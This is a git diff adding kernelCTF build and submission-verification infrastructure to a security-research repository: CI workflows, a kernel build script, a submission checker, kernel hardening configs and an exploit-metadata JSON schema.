diff --git a/.github/workflows/kernelctf-auto-releaser.yaml b/.github/workflows/kernelctf-auto-releaser.yaml new file mode 100644 index 00000000..dc83a0a2 --- /dev/null +++ b/.github/workflows/kernelctf-auto-releaser.yaml @@ -0,0 +1,38 @@ +name: kernelCTF auto releaser +on: + workflow_dispatch: + schedule: + - cron: '0 12 * * *' # every day at 12:00 UTC +permissions: {} +defaults: + run: + shell: bash + working-directory: kernelctf +jobs: + get_new_builds: + runs-on: ubuntu-latest + steps: + - name: Checkout repo + uses: actions/checkout@v4 + + - name: Install prerequisites + run: sudo apt install -yq --no-install-recommends python3-lxml + + - id: check + name: Check latest kernel versions + run: ./get_latest_kernel_versions.py + outputs: + releases: ${{ steps.check.outputs.releases }} + + build_release: + needs: get_new_builds + if: fromJSON(needs.get_new_builds.outputs.releases)[0] != null + strategy: + matrix: + release: ${{ fromJSON(needs.get_new_builds.outputs.releases) }} + fail-fast: false # do not cancel other builds + uses: ./.github/workflows/kernelctf-release-build.yaml + secrets: inherit + with: + releaseId: ${{ matrix.release.releaseId }} + branch: ${{ matrix.release.branch }} diff --git a/.github/workflows/kernelctf-release-build.yaml b/.github/workflows/kernelctf-release-build.yaml new file mode 100644 index 00000000..ae8819ed --- /dev/null +++ b/.github/workflows/kernelctf-release-build.yaml @@ -0,0 +1,73 @@ +name: kernelCTF release build +on: + workflow_dispatch: + inputs: + releaseId: + description: 'Release ID' + type: string + required: true + branch: + description: 'Branch, tag or commit' + type: string + required: false + workflow_call: + inputs: + releaseId: + type: string + branch: + type: string +run-name: 'kernelCTF release: ${{inputs.releaseId}}' +permissions: {} +defaults: + run: + shell: bash + working-directory: kernelctf +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Checkout repo + uses: actions/checkout@v4 + + - name: Check release does not exist yet + run: curl --fail -I https://storage.googleapis.com/kernelctf-build/releases/${{inputs.releaseId}}/bzImage && exit 1 || true + + - name: Install prerequisites + run: sudo apt install -yq --no-install-recommends build-essential flex bison bc ca-certificates libelf-dev libssl-dev cpio pahole + + - name: Build + run: ./build_release.sh ${{inputs.releaseId}} ${{inputs.branch}} + + - name: Show releases + run: find releases -type f|xargs ls -al + + - name: Upload release artifact + uses: actions/upload-artifact@v3 + with: + name: ${{inputs.releaseId}} + path: kernelctf/releases/${{inputs.releaseId}} + if-no-files-found: error + + upload: + runs-on: ubuntu-latest + needs: build + steps: + - name: Download exploit + uses: actions/download-artifact@v3 + with: + name: ${{inputs.releaseId}} + path: ./kernelctf/releases/${{inputs.releaseId}} + + - name: Authenticate to Google Cloud + uses: google-github-actions/auth@v1 + with: + credentials_json: '${{secrets.KERNELCTF_GCS_SA_KEY}}' + + - name: Upload release + uses: 'google-github-actions/upload-cloud-storage@v1' + with: + path: kernelctf/releases/${{inputs.releaseId}} + destination: kernelctf-build/releases + predefinedAcl: publicRead + gzip: false # most of the files are compressed already, do not compress them again + process_gcloudignore: false # removes warnings that .gcloudignore file does not exist diff --git a/.github/workflows/kernelctf-submission-verification.yaml b/.github/workflows/kernelctf-submission-verification.yaml index 02a84290..fb4e4d7d 100644 --- a/.github/workflows/kernelctf-submission-verification.yaml +++ b/.github/workflows/kernelctf-submission-verification.yaml @@ -21,16 +21,18 @@ jobs: outputs: targets: ${{ steps.check_submission.outputs.targets }} submission_dir: ${{ steps.check_submission.outputs.submission_dir }} + exploits_info: ${{ steps.check_submission.outputs.exploits_info }} + artifact_backup_dir: ${{ steps.check_submission.outputs.artifact_backup_dir }} steps: - run: pip install -U jsonschema - name: Checkout repo content - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: ref: master - name: Checkout PR content - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: path: pr ref: ${{ env.PR_REF }} @@ -56,7 +58,7 @@ jobs: EXPLOIT_DIR: pr/pocs/linux/kernelctf/${{ needs.structure_check.outputs.submission_dir }}/exploit/${{ matrix.target }} steps: - name: Checkout PR content - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: path: pr ref: ${{ env.PR_REF }} @@ -114,9 +116,14 @@ jobs: env: RELEASE_ID: ${{ matrix.target }} SUBMISSION_DIR: ${{ needs.structure_check.outputs.submission_dir }} + EXPLOIT_INFO: ${{ toJSON(fromJSON(needs.structure_check.outputs.exploits_info)[matrix.target]) }} + defaults: + run: + shell: bash + working-directory: ./kernelctf/repro/ steps: - name: Checkout repo content - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: ref: master @@ -133,12 +140,11 @@ jobs: uses: actions/download-artifact@v3 with: name: exploit_${{ env.RELEASE_ID }} - path: exp/ + path: ./kernelctf/repro/exp/ - name: Fetch rootfs run: | - wget https://storage.googleapis.com/kernelctf-build/files/rootfs_repro_v1.img.gz - mv rootfs_repro_v1.img.gz rootfs.img.gz + wget -O rootfs.img.gz https://storage.googleapis.com/kernelctf-build/files/rootfs_repro_v2.img.gz gzip -d rootfs.img.gz - name: Download bzImage @@ -146,66 +152,99 @@ jobs: if [ "$RELEASE_ID" == "mitigation-6.1" ]; then RELEASE_ID="mitigation-6.1-v2"; fi wget https://storage.googleapis.com/kernelctf-build/releases/$RELEASE_ID/bzImage + - name: List repro folder contents + run: ls -alR ./ + # ugly hack to make Github Actions UI to show repro logs separately in somewhat readable fashion - id: repro1 name: Reproduction (1 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 1 + run: ./repro.sh 1 - id: repro2 name: Reproduction (2 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 2 + run: ./repro.sh 2 - id: repro3 name: Reproduction (3 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 3 + run: ./repro.sh 3 - id: repro4 name: Reproduction (4 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 4 + run: ./repro.sh 4 - id: repro5 name: Reproduction (5 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 5 + run: ./repro.sh 5 - id: repro6 name: Reproduction (6 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 6 + run: ./repro.sh 6 - id: repro7 name: Reproduction (7 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 7 + run: ./repro.sh 7 - id: repro8 name: Reproduction (8 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 8 + run: ./repro.sh 8 - id: repro9 name: Reproduction (9 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 9 + run: ./repro.sh 9 - id: repro10 name: Reproduction (10 / 10) continue-on-error: true - run: ./kernelctf/repro.sh 10 + run: ./repro.sh 10 - name: Upload repro QEMU logs as an artifact uses: actions/upload-artifact@v3 with: name: repro_logs_${{ env.RELEASE_ID }} - path: repro_log_*.txt + path: ./kernelctf/repro/repro_log_*.txt - name: Reproduction // Summary env: STEPS: ${{ toJSON(steps) }} run: | echo $STEPS >> steps.json - ./kernelctf/repro_summary.py ${{ github.run_id }} + ../repro_summary.py ${{ github.run_id }} + + - name: Upload repro summary as an artifact + uses: actions/upload-artifact@v3 + with: + name: repro_summary_${{ env.RELEASE_ID }} + path: ./kernelctf/repro/repro_summary.md + + backup_artifacts: + runs-on: ubuntu-latest + needs: [structure_check, exploit_build, exploit_repro] + if: always() && needs.structure_check.result == 'success' + steps: + - name: Download artifacts + uses: actions/download-artifact@v3 + with: + path: ./artifacts + + - name: Authenticate to Google Cloud + uses: google-github-actions/auth@v1 + with: + credentials_json: '${{secrets.KERNELCTF_GCS_SA_KEY}}' + + - name: Upload artifacts to GCS + uses: 'google-github-actions/upload-cloud-storage@v1' + with: + path: ./artifacts + destination: kernelctf-build/artifacts/${{ needs.structure_check.outputs.artifact_backup_dir }}_${{ github.run_id }} + parent: false + predefinedAcl: publicRead + process_gcloudignore: false # removes warnings that .gcloudignore file does not exist diff --git a/.gitignore b/.gitignore new file mode 100644 index 00000000..a6a15c24 --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +pocs/cpus/reptar/minimized/reptar.*.bin +pocs/cpus/reptar/minimized/reptar.*.elf +pocs/cpus/reptar/minimized/reptar.log diff --git a/README.md b/README.md index 7abfc65d..dd7b100b 100644 --- a/README.md +++ b/README.md @@ -41,7 +41,7 @@ security vulnerabilities. | 2021 | Linux: KVM VM_IO\|VM_PFNMAP vma mishandling | [CVE-2021-22543](https://github.com/google/security-research/security/advisories/GHSA-7wq5-phmq-m584) | [PoC](pocs/linux/kvm_vma) | 2021 | BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution | [CVE-2020-24490](https://github.com/google/security-research/security/advisories/GHSA-ccx2-w2r4-x649), [CVE-2020-12351](https://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq), [CVE-2020-12352](https://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq) | [Write-up](https://google.github.io/security-research/pocs/linux/bleedingtooth/writeup.html), [PoC](pocs/linux/bleedingtooth) -# Licence & Patents +# License & Patents The advisories and patches posted here are free and open source. diff --git a/kernelctf/.gitignore b/kernelctf/.gitignore new file mode 100644 index 00000000..8ad4c342 --- /dev/null +++ b/kernelctf/.gitignore @@ -0,0 +1,4 @@ +.cache/ +__pycache__/ +builds/ +releases/ diff --git a/kernelctf/build_release.sh b/kernelctf/build_release.sh new file mode 100755 index 00000000..2822922c --- /dev/null +++ b/kernelctf/build_release.sh @@ -0,0 +1,108 @@ +#!/bin/bash +set -ex + +usage() { + echo "Usage: $0 (lts|cos|mitigation)- []"; + exit 1; +} + +RELEASE_NAME="$1" +BRANCH="$2" + +if [[ ! "$RELEASE_NAME" =~ ^(lts|cos|mitigation)-(.*) ]]; then usage; fi +TARGET="${BASH_REMATCH[1]}" +VERSION="${BASH_REMATCH[2]}" + +case $TARGET in + lts) + REPO="https://github.com/gregkh/linux" + DEFAULT_BRANCH="v${VERSION}" + CONFIG_FN="lts.config" + ;; + cos) + REPO="https://cos.googlesource.com/third_party/kernel" + ;; + mitigation) + REPO="https://github.com/thejh/linux" + case $VERSION in + v3-6.1.55) + DEFAULT_BRANCH="mitigations-next" + CONFIG_FN="mitigation-v3.config" + CONFIG_FULL_FN="mitigation-v3-full.config" + ;; + 6.1 | 6.1-v2) + DEFAULT_BRANCH="slub-virtual-v6.1" + CONFIG_FN="mitigation-v1.config" + ;; + esac ;; + *) + usage ;; +esac + +BRANCH="${BRANCH:-$DEFAULT_BRANCH}" +if [ -z "$BRANCH" ]; then usage; fi + +echo "REPO=$REPO" +echo "BRANCH=$BRANCH" + +BASEDIR=`pwd` +BUILD_DIR="$BASEDIR/builds/$RELEASE_NAME" +RELEASE_DIR="$BASEDIR/releases/$RELEASE_NAME" +CONFIGS_DIR="$BASEDIR/kernel_configs" + +if [ -d "$RELEASE_DIR" ]; then echo "Release directory already exists. Stopping."; exit 1; fi + +mkdir -p $BUILD_DIR 2>/dev/null || true +cd $BUILD_DIR +if [ ! -d ".git" ]; then git init && git remote add origin $REPO; fi + +if ! git checkout $BRANCH; then + git fetch --depth 1 origin $BRANCH:$BRANCH || true # TODO: hack, solve it better + git checkout $BRANCH +fi + +if [ "$TARGET" == "cos" ]; then + rm lakitu_defconfig || true + make lakitu_defconfig + cp .config lakitu_defconfig +else + curl 'https://cos.googlesource.com/third_party/kernel/+/refs/heads/cos-6.1/arch/x86/configs/lakitu_defconfig?format=text'|base64 -d > lakitu_defconfig + cp lakitu_defconfig .config +fi + +# build everything into the kernel instead of modules +# note: this can increase the attack surface! +sed -i s/=m/=y/g .config + +if [ ! -z "$CONFIG_FN" ]; then + cp $CONFIGS_DIR/$CONFIG_FN kernel/configs/ + make $CONFIG_FN +fi + +make olddefconfig + +if [ ! -z "$CONFIG_FN" ]; then + if scripts/diffconfig $CONFIGS_DIR/$CONFIG_FN .config|grep "^[^+]"; then + echo "Config did not apply cleanly." + exit 1 + fi +fi + +if [ ! -z "$CONFIG_FULL_FN" ]; then + if scripts/diffconfig $CONFIGS_DIR/$CONFIG_FULL_FN .config|grep "^[^+]"; then + echo "The full config has differences compared to the applied config. Check if the base config changed since custom config was created." + exit 1 + fi +fi + +make -j`nproc` + +mkdir -p $RELEASE_DIR 2>/dev/null || true + +echo "REPOSITORY_URL=$REPO" > $RELEASE_DIR/COMMIT_INFO +(echo -n "COMMIT_HASH="; git rev-parse HEAD) >> $RELEASE_DIR/COMMIT_INFO + +cp $BUILD_DIR/arch/x86/boot/bzImage $RELEASE_DIR/ +cp $BUILD_DIR/lakitu_defconfig $RELEASE_DIR/ +cp $BUILD_DIR/.config $RELEASE_DIR/ +gzip -c $BUILD_DIR/vmlinux > $RELEASE_DIR/vmlinux.gz diff --git a/kernelctf/check-submission.py b/kernelctf/check-submission.py index 3842ccf4..a0870424 100755 --- a/kernelctf/check-submission.py +++ b/kernelctf/check-submission.py @@ -1,99 +1,21 @@ #!/usr/bin/env -S python3 -u import os -import re -import subprocess import sys import json import jsonschema -import requests -import csv -import io import hashlib +from utils import * PUBLIC_CSV_URL = "https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pub?output=csv" POC_FOLDER = "pocs/linux/kernelctf/" EXPLOIT_DIR = "exploit/" MIN_SCHEMA_VERSION = 2 -DEBUG = "--debug" in sys.argv - -errors = [] -warnings = [] - -def error(msg): - global errors - msg = msg.replace('\n', '\n ') - errors.append(msg) - print(f"\n[!] [ERROR] {msg}") - -def warning(msg): - global warnings - msg = msg.replace('\n', '\n ') - warnings.append(msg) - print(f"\n[!] [WARN] {msg}") - -def fail(msg): - print("\n[!] [FAIL] " + msg.replace('\n', '\n ')) - os._exit(1) - -def run(cmd): - try: - result = subprocess.check_output(cmd, shell=True).decode('utf-8').split('\n') - return result if result[-1] != "" else result[0:-1] - except subprocess.CalledProcessError as e: - fail(f"executing '{cmd}' failed with exit code {e.returncode}") - -def subdirEntries(files, subdir): - return list(set([f[len(subdir):].split('/')[0] for f in files if f.startswith(subdir)])) - -def formatList(items, nl=False): - return ('\n' if nl else '').join([f"\n - {item}" for item in items]) - -def printList(title, items): - print(f"\n{title}:" + formatList(items)) - -def errorList(errorMsg, items, warningOnly=False): - itemsStr = ", ".join(f"`{x}`" for x in items) - errorMsg = errorMsg.replace("", itemsStr) if "" in errorMsg else f"{errorMsg}: {itemsStr}" - if warningOnly: - warning(errorMsg) - else: - error(errorMsg) - -def checkOnlyOne(list, errorMsg): - if len(list) > 1: - errorList(errorMsg, list) - return list[0] - -def checkList(items, isAllowedFunc, errorMsg, warningOnly=False): - disallowedItems = [item for item in items if not isAllowedFunc(item)] - if len(disallowedItems) > 0: - errorList(errorMsg, disallowedItems, warningOnly) - return list(sorted(set(items) - set(disallowedItems))) - -def checkAtLeastOne(list, errorMsg): - if len(list) == 0: - fail(errorMsg) - -def checkRegex(text, pattern, errorMsg): - m = re.match(pattern, text) - if not m: - error(f"{errorMsg}. Must match regex `{pattern}`") - return m - -def fetch(url): - response = requests.get(url) - if response.status_code != 200: - fail(f"expected 200 OK for request: {url}") - return response.content.decode('utf-8') - -def parseCsv(csvContent): - columns, *rows = list(csv.reader(io.StringIO(csvContent), strict=True)) - return [{ columns[i]: row[i] for i in range(len(columns)) } for row in rows] +# DEBUG = "--debug" in sys.argv argv = [arg for arg in sys.argv if not arg.startswith("--")] print(f"[-] Argv: {argv}") -mergeInto = argv[1] if len(argv) >= 2 else "origin/main" +mergeInto = argv[1] if len(argv) >= 2 else "origin/master" print(f"[-] Params: mergeInto = {mergeInto}") mergeBase = run(f"git merge-base HEAD {mergeInto}")[0] @@ -149,7 +71,7 @@ def parseCsv(csvContent): schemaVersion = MIN_SCHEMA_VERSION schemaUrl = f"https://google.github.io/security-research/kernelctf/metadata.schema.v{schemaVersion}.json" - schema = json.loads(fetch(schemaUrl)) + schema = json.loads(fetch(schemaUrl, f"metadata.schema.v{schemaVersion}.json")) metadataErrors = list(jsonschema.Draft202012Validator(schema).iter_errors(metadata)) if len(metadataErrors) > 0: @@ -159,13 +81,10 @@ def parseCsv(csvContent): submissionIds = metadata.get("submission_ids", None) or metadata["submission_id"] if isinstance(submissionIds, str): submissionIds = [submissionIds] +submissionIds.sort() print(f"[-] Submission IDs = {submissionIds}") -if DEBUG: - with open("public.csv", "rt") as f: publicCsv = f.read() -else: - publicCsv = fetch(PUBLIC_CSV_URL) - +publicCsv = fetch(PUBLIC_CSV_URL, "public.csv") publicSheet = { x["ID"]: x for x in parseCsv(publicCsv) } # print(json.dumps(publicSheet, indent=4)) @@ -173,6 +92,7 @@ def parseCsv(csvContent): fail(f"submission ID ({submissionId}) was not found on public spreadsheet") submissionIds = list(set(submissionIds).intersection(publicSheet.keys())) +submissionIds.sort() flags = [] for submissionId in submissionIds: @@ -193,6 +113,8 @@ def parseCsv(csvContent): if exploitHash != calculated: error(f"Expected `{archiveFn}` with SHA256 hash of `{exploitHash}`, but the file's checksum is `{calculated}`.") + else: + print(f"[+] The hash of the file `{archiveFn}` matches the expected `{exploitHash}` value.") flags.extend(publicData["Flags"].strip().split('\n')) @@ -201,16 +123,12 @@ def parseCsv(csvContent): flagTargets = set([checkRegex(flag, r"kernelCTF\{v1:([^:]+):\d+\}", f"The flag (`{flag}`) is invalid").group(1) for flag in flags]) if "mitigation-6.1-v2" in flagTargets: - flagTargets = flagTargets - set(["mitigation-6.1-v2"]) | set(["mitigation-6.1"]) + flagTargets = flagTargets - {"mitigation-6.1-v2"} | {"mitigation-6.1"} print(f"[-] Got flags for the following targets: {', '.join(flagTargets)}") checkList(flagTargets, lambda t: t in exploitFolders, f"Missing exploit for target(s)") checkList(exploitFolders, lambda t: t in flagTargets, f"Found extra exploit(s) without flag submission", True) - -def ghSet(varName, content): - varName = f"GITHUB_{varName}" - print(f"[+] Writing {json.dumps(content)} to ${varName}") - if varName in os.environ: - with open(os.environ[varName], 'at') as f: f.write(content + "\n") +if schemaVersion >= 3: + checkList(flagTargets, lambda t: t in metadata["exploits"].keys(), f"Missing metadata information for exploit(s)") def summary(success, text): if warnings: @@ -222,8 +140,17 @@ def summary(success, text): if len(errors) > 0: summary(False, f"The file structure verification of the PR failed with the following errors:\n{formatList([f'❌ {e}' for e in errors], True)}") -ghSet("OUTPUT", "targets=" + json.dumps([f for f in exploitFolders if not f.startswith("extra-")])) +ghSet("OUTPUT", "targets=" + json.dumps([f for f in flagTargets])) ghSet("OUTPUT", f"submission_dir={subDirName}") +exploits_info = {} +for target in flagTargets: + if schemaVersion >= 3: + exploit_info = metadata["exploits"].get(target) + if not exploit_info: continue + exploits_info[target] = { key: exploit_info[key] for key in ["uses", "requires_separate_kaslr_leak"] if key in exploit_info } +ghSet("OUTPUT", f"exploits_info={json.dumps(exploits_info)}") +ghSet("OUTPUT", f"artifact_backup_dir={'_'.join(submissionIds)}") + summary(True, f"✅ The file structure verification of the PR was successful!") diff --git a/kernelctf/get_latest_kernel_versions.py b/kernelctf/get_latest_kernel_versions.py new file mode 100755 index 00000000..d694374e --- /dev/null +++ b/kernelctf/get_latest_kernel_versions.py @@ -0,0 +1,35 @@ +#!/usr/bin/env -S python3 -u +import json +from utils import * +from lxml import etree + +releases = [] + +def add_release(release_id, branch=None): + url = f"https://storage.googleapis.com/kernelctf-build/releases/{release_id}/bzImage" + status_code = requests.head(url).status_code + if status_code == 200: + print(" -> Release already exists, skipping...") + return + if status_code != 403: + fail(f"Unexpected HTTP status code for release check: {status_code} (url = {url})") + + global releases + releases.append({ "releaseId": release_id, "branch": branch }) + +latest_lts = run("git ls-remote --tags --sort='-v:refname' https://github.com/gregkh/linux 'v6.1.*[0-9]'")[0].split("refs/tags/")[1] +print(f"Latest LTS: {latest_lts}") +add_release(f"lts-{latest_lts[1:]}") + +for cos_milestone in [97, 105]: + release_notes = fetch(f"https://cloud.google.com/feeds/cos-{cos_milestone}-release-notes.xml") + tree = etree.XML(release_notes.encode('utf-8')) + entries = tree.xpath("//*[local-name() = 'content']/text()") + latest_entry = entries[0] + version_tuple = checkOnlyOne(list(set(re.findall(f"cos-{cos_milestone}-(\d+)-(\d+)-(\d+)", latest_entry))), "too many versions were found") + release_id = f"cos-{cos_milestone}-{'.'.join(version_tuple)}" + commit = checkOnlyOne(re.findall("https://cos.googlesource.com/third_party/kernel/\+/([0-9a-f]{40})", latest_entry), "multiple commits were found") + print(f"Latest COS {cos_milestone}: {release_id}, commit = {commit}") + add_release(release_id, commit) + +ghSet("OUTPUT", "releases=" + json.dumps(releases)) diff --git a/kernelctf/kernel_configs/lts.config b/kernelctf/kernel_configs/lts.config new file mode 100644 index 00000000..88360512 --- /dev/null +++ b/kernelctf/kernel_configs/lts.config @@ -0,0 +1,2 @@ +# CONFIG_IO_URING is not set +CONFIG_SYSTEM_TRUSTED_KEYS="" diff --git a/kernelctf/kernel_configs/mitigation-v1.config b/kernelctf/kernel_configs/mitigation-v1.config new file mode 100644 index 00000000..dc0e1158 --- /dev/null +++ b/kernelctf/kernel_configs/mitigation-v1.config @@ -0,0 +1,12 @@ +# CONFIG_IO_URING is not set +CONFIG_SYSTEM_TRUSTED_KEYS="" + +## required by CONFIG_SLAB_VIRTUAL +CONFIG_DEBUG_VIRTUAL=y + +## required by CONFIG_KMALLOC_SPLIT_VARSIZE +# CONFIG_SLAB_MERGE_DEFAULT is not set + +## turns on Jann's hardening +CONFIG_KMALLOC_SPLIT_VARSIZE=y +CONFIG_SLAB_VIRTUAL=y diff --git a/kernelctf/kernel_configs/mitigation-v3-full.config b/kernelctf/kernel_configs/mitigation-v3-full.config new file mode 100644 index 00000000..a916c33e --- /dev/null +++ b/kernelctf/kernel_configs/mitigation-v3-full.config @@ -0,0 +1,113 @@ +################### General hardening ########################################## + +# Panic instead of failing gracefully and printing a warning when detecting data +# corruption (e.g. in list debugging and SLAB_VIRTUAL) +CONFIG_BUG_ON_DATA_CORRUPTION=y +# Check linked lists for corruption. Must be enabled together with +# CONFIG_BUG_ON_DATA_CORRUPTION. +CONFIG_DEBUG_LIST=y +# Prevent overflows and other overwrites in copy_from/to_user +CONFIG_HARDENED_USERCOPY=y +# Detect some buffer overflows in strcpy/memcpy +CONFIG_FORTIFY_SOURCE=y +# Sets kernel.dmesg_restrict to 1 by default +CONFIG_SECURITY_DMESG_RESTRICT=y +# Prevent processes belonging to the same (unprivileged) user from ptracing each +# other except for parents ptracing their children +CONFIG_SECURITY_YAMA=y +# Zero stack frames on function entry, makes some uninitialized variable uses +# unexploitable +CONFIG_INIT_STACK_ALL_ZERO=y +# Print a warning if there are WX mappings at boot +CONFIG_DEBUG_WX=y +# Stack canaries +CONFIG_STACKPROTECTOR=y +CONFIG_STACKPROTECTOR_STRONG=y +# Guard pages for kernel stacks +CONFIG_VMAP_STACK=y +# Randomize the offset of data on the kernel stack in syscalls +CONFIG_RANDOMIZE_KSTACK_OFFSET=y +CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT=y +# Text KASLR +CONFIG_RANDOMIZE_BASE=y +# Other KASLR +CONFIG_RANDOMIZE_MEMORY=y +# Enforce W^X in the kernel +CONFIG_STRICT_KERNEL_RWX=y +CONFIG_STRICT_MODULE_RWX=y +# Enable UMIP on the CPU to prevent using sidt/sgdt in userspace to leak kernel +# pointers (if the CPU supports UMIP) +CONFIG_X86_UMIP=y + +################### CPU side channels ########################################## + +# Meltdown mitigation +CONFIG_PAGE_TABLE_ISOLATION=y +# Spectre mitigations +CONFIG_RETPOLINE=y +CONFIG_CPU_IBPB_ENTRY=y +CONFIG_CPU_IBRS_ENTRY=y + +################### Memory allocator ########################################### + +# SLUB because SLAB_VIRTUAL doesn't support SLAB or SLOB and those are +# deprecated anyway +CONFIG_SLUB=y +# Randomize the order of the freelist when a new slab is created +CONFIG_SLAB_FREELIST_RANDOM=y +# Prevent attacks on the SLUB freelists +CONFIG_SLAB_FREELIST_HARDENED=y +# Don't merge slab caches (makes random caches/varsize useless and cross-cache easier) +CONFIG_SLAB_MERGE_DEFAULT=n +# Allocate msg_msg and some other useful objects in separate -cg caches +CONFIG_CGROUPS=y +CONFIG_MEMCG=y + +################### BPF ######################################################## + +# Allow sandboxing with seccomp +CONFIG_SECCOMP=y +CONFIG_SECCOMP_FILTER=y +# This is required for jitting seccomp filters (probably) +CONFIG_BPF_SYSCALL=y +# Remove Spectre gadgets in the BPF interpreter +CONFIG_BPF_JIT=y +CONFIG_BPF_JIT_ALWAYS_ON=y +# Makes the kernel.unprivileged_bpf_disabled default to 2 +CONFIG_BPF_UNPRIV_DEFAULT_OFF=y + +################### Attack surface reduction ################################### + +# Disable io_uring +CONFIG_IO_URING=n +# Prevent attackers from stopping the kernel inside copy_from/to_user +CONFIG_USERFAULTFD=n +CONFIG_FUSE_FS=n +# Disable staging drivers, which may be more buggy +CONFIG_STAGING=n + +################## Extra mitigations/not upstreamed ############################ + +# Protects against cross-cache attacks. Must be enabled together with +# CONFIG_BUG_ON_DATA_CORRUPTION +CONFIG_SLAB_VIRTUAL=y +# Splits kmalloc caches in fixed-size and dynamic size to make UaF exploitation +# harder +CONFIG_KMALLOC_SPLIT_VARSIZE=y +# Create multiple copies of the normal and -cg kmalloc caches to make spraying +# harder +CONFIG_RANDOM_KMALLOC_CACHES=y + +################### Make the kernel less annyoing to debug ##################### + +# Compile the kernel with debug info +CONFIG_DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT=y +# Have all symbols in kallsyms +CONFIG_KALLSYMS=y +CONFIG_KALLSYMS_ALL=y +CONFIG_TRIM_UNUSED_KSYMS=n +# Include the kernel configuration in the bzImage/vmlinux +CONFIG_IKCONFIG=y +CONFIG_IKCONFIG_PROC=y +# SLUB stats in /sys/slab +SLUB_DEBUG=y diff --git a/kernelctf/kernel_configs/mitigation-v3.config b/kernelctf/kernel_configs/mitigation-v3.config new file mode 100644 index 00000000..11dd6752 --- /dev/null +++ b/kernelctf/kernel_configs/mitigation-v3.config @@ -0,0 +1,25 @@ +# CONFIG_IO_URING is not set +CONFIG_SYSTEM_TRUSTED_KEYS="" + +## required by CONFIG_KMALLOC_SPLIT_VARSIZE +# CONFIG_SLAB_MERGE_DEFAULT is not set + +## turns on our mitigations +CONFIG_KMALLOC_SPLIT_VARSIZE=y +CONFIG_SLAB_VIRTUAL=y + +## turns on CONFIG_RANDOM_KMALLOC_CACHES +CONFIG_RANDOM_KMALLOC_CACHES=y + +## turns on additional hardenings +CONFIG_BUG_ON_DATA_CORRUPTION=y +CONFIG_FORTIFY_SOURCE=y +CONFIG_DEBUG_WX=y +CONFIG_BPF_UNPRIV_DEFAULT_OFF=y +# CONFIG_FUSE_FS is not set + +### Make the kernel less annoying to debug +## Compile the kernel with debug info +CONFIG_DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT=y +# Have all symbols in kallsyms +CONFIG_KALLSYMS_ALL=y diff --git a/kernelctf/metadata.schema.v3.json b/kernelctf/metadata.schema.v3.json new file mode 100644 index 00000000..c56374db --- /dev/null +++ b/kernelctf/metadata.schema.v3.json @@ -0,0 +1,105 @@ +{ + "$id": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "$schema": "https://json-schema.org/draft/2020-12/schema", + "title": "kernelCTF submission metadata", + "type": "object", + "required": ["$schema", "submission_ids", "vulnerability", "exploits"], + "properties": { + "$schema": { + "const": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json" + }, + "submission_ids": { + "description": "Identifier(s) of the submission(s). Can be found on the public kernelCTF spreadsheet (https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml?gid=2095368189) after a valid flag was submitted via the submission form.", + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^exp[0-9]+$" + } + }, + "vulnerability": { + "type": "object", + "required": ["patch_commit", "cve", "affected_versions", "requirements"], + "properties": { + "summary": { + "type": "string", + "description": "Short, one line summary of the vulnerability" + }, + "patch_commit": { + "type": "string", + "pattern": "^https://git.kernel.org/pub/scm/linux/kernel/git/(torvalds|stable)/linux.git/commit/" + }, + "cve": { + "type": "string", + "pattern": "^CVE-[0-9]{4}-[0-9]{4,5}$" + }, + "affected_versions": { + "description": "Linux kernel versions affected by the vulnerability, inclusive range.", + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^[0-9]+(\\.[0-9]+)+(-rc[0-9]+)? - [0-9]+(\\.[0-9]+)+(-rc[0-9]+)?$" + } + }, + "requirements": { + "type": "object", + "required": ["attack_surface", "capabilities", "kernel_config"], + "properties": { + "attack_surface": { + "type": "array", + "uniqueItems": true, + "items": { + "enum": ["userns", "io_uring"] + } + }, + "capabilities": { + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^CAP_" + } + }, + "kernel_config": { + "type": "array", + "uniqueItems": true, + "items": { + "type": "string", + "pattern": "^CONFIG_" + } + } + } + }, + "syzkaller_reference": { + "pattern": "^https://syzkaller.appspot.com/" + } + } + }, + "exploits": { + "type": "object", + "additionalProperties": false, + "patternProperties": { + "^((lts-[0-9]+.[0-9]+(\\.[0-9]+)?)|(mitigation-[0-9]+\\.[0-9]+(\\.[0-9]+)?)|(cos-[0-9]{2,}-[0-9]+\\.[0-9]+\\.[0-9]+)|extra-.*)$": { + "type": "object", + "required": ["uses", "requires_separate_kaslr_leak", "stability_notes"], + "properties": { + "uses": { + "type": "array", + "uniqueItems": true, + "items": { "enum": ["userns", "io_uring"] } + }, + "requires_separate_kaslr_leak": { + "type": "boolean", + "description": "Whether the exploit requires a separate KASLR leak or KASLR bruteforce." + }, + "stability_notes": { + "type": "string", + "description": "Notes on the stability of the exploit. How percentage the exploit can get the flag or how many times needs to be run on average to get the flag (e.g. 90%, 50%, or needs to be run 10 times to get the flag once)." + } + } + } + } 